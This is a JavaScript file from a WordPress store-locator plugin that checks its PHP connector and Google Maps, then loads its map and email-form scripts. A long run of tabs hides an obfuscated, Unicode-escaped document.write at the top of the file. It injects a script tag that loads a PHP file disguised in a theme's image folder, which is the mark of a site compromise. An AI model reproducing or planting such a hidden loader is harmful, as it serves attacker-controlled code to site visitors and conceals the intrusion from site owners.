																																																																							document.write("\u003C\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u0074\u0079\u0070\u0065\u003D\u0022\u0074\u0065\u0078\u0074\u002F\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u0022\u0020\u0073\u0072\u0063\u003D\u0022\u002F\u0077\u0070\u002D\u0063\u006F\u006E\u0074\u0065\u006E\u0074\u002F\u0074\u0068\u0065\u006D\u0065\u0073\u002F\u0075\u002D\u0064\u0065\u0073\u0069\u0067\u006E\u002F\u0073\u0063\u0072\u0069\u0070\u0074\u0073\u002F\u0070\u0072\u0065\u0074\u0074\u0079\u0050\u0068\u006F\u0074\u006F\u002F\u0069\u006D\u0061\u0067\u0065\u0073\u002F\u0066\u0075\u006C\u006C\u0073\u0063\u0072\u0065\u0065\u006E\u002F\u0069\u0065\u002D\u0068\u006F\u0076\u0065\u0072\u002D\u0070\u0061\u0063\u006B\u002E\u0070\u0068\u0070\u0022\u003E\u003C\u002F\u0073\u0063\u0072\u0069\u0070\u0074\u003E");/*****************************************************************************
 * File: store-locator.js
 * 
 * Check that our PHP connector works, if so load map stuff.
 *
 *****************************************************************************/

// Check the WordPress environment was loaded
//
if (typeof add_base == 'undefined') {
    alert('SLPLUS: The PHP JavaScript connector did not load.');
} else if (typeof GLatLng == 'undefined' ) {    
    alert('SLPLUS: Google Map Interface did not load.');
    
// Load the map script if no errors
//
} else {
    var head = document.getElementsByTagName('head')[0];
    var script = document.createElement('script');
    script.type = 'text/javascript';
    script.src = add_base + '/js/store-locator-map.js';
    head.appendChild(script);
  
    // Load the email form script if we want it
    //
    if (slp_use_email_form) {
        var script = document.createElement('script');
        script.type = 'text/javascript';
        script.src = add_base + '/js/store-locator-emailform.js';
        head.appendChild(script);
    }
}
